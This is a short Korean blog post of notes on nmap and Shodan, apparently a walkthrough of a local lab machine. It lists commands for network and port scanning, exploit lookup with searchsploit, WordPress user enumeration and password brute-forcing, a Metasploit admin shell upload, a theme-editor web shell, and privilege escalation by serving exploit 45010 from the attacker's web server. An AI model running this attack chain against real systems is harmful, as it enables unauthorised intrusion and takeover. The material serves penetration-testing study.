[ Tools ] nmap과 shodan사용법

sangjun

·

2022. 5. 12. 19:25

반응형

 

nmap

nmap -sn [아이피 주소] 

-> ARP프로토콜을 이용해 IP스캔

 

nmap -p1-65535 [아이피 주소]

-> 포트스캔

-> -O까지 붙이면 운영체제까지 스캔

-> -sV까지 붙이면 열린 포트 서비스의 버전까지 확인

-> -A 모두 다 탐지함. NSE기능 좋음.

 

searchsploit [버전 이름 그대로]

-> searchsploit -x 번호 -> 익스코드 찾아줌

 

nmap -sV 192.168.0.5 -oX result.xml

searchsploit --nmap result.xml

-> nmap의 결과를 그대로 searchsploit돌려준다

 

1. 칼리 아디 비번: kali

2. nmap -sn [아이피 주소] 
-> ARP프로토콜 이용해 아이피 스캔

3. nmap -p1-65535 [아이피 주소]
-> 포트스캔
-> -O까지 붙이면 운영체제까지 스캔
-> -sV까지 붙이면 열린 서비스의 버전까지 확인

. 

3. searchsploit [버전 이름 그대로]
-> searchsploit -x 번호 -> 익스코드 찾아줌

4. nmap -sV 192.168.0.5 -oX result.xml
   searchsploit --nmap result.xml

5. dirbuster
-> 웹에서 디렉토리 브루트포싱으로 찾아줌
-> /usr/share/wordlist/disturb에 이씀

6. login창으로 가면 vtscec떄문에 이상하게됨
/etc/hosts를 고쳐줌

7. 워드프레스 /secret/wp-login에 로그인 ㄱㄴ
sudo wpscan --url http://192.168.0.5/secret/ -e u
-> admin이라는 아이디 찾음

wpscan --url http://192.168.0.5/secret/ --usernames admin --passwords /usr/share/wordlists/metasploit/http_default_pass.txt --max-threads 20

8. msfconsole이용하기
- sudo systemctl start postgresql
- sudo msfdb init
- sudo msfconsole

msf6 > search wordpress admin shell
msf6 > use exploit/unix/webapp/wp_admin_shell_upload 
msf6 exploit(unix/webapp/wp_admin_shell_upload) > info 
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > getuid

9. 메타스플로잇 말고 직접해보기
- 테마 editor에서 웹쉘 올리고
- http://192.168.0.5/secret/wp-content/themes/twentyseventeen/404.php

10. 권한 상승
- uname -a
- lsb_release -a
- hostnamectl
- searchsploit ubuntu 16.04
- searchsploit -m 45010
- sudo service apache2 start
- sudo cp /home/kali/45010.c /var/www/html/45010.c
- 파일 다운받아 실행시킨다.

11. misconfiguration을 이용해 LPE
- 
--------------------------------------------
1. sudo nikto -h 192.168.0.6

 

 

반응형

0개의 댓글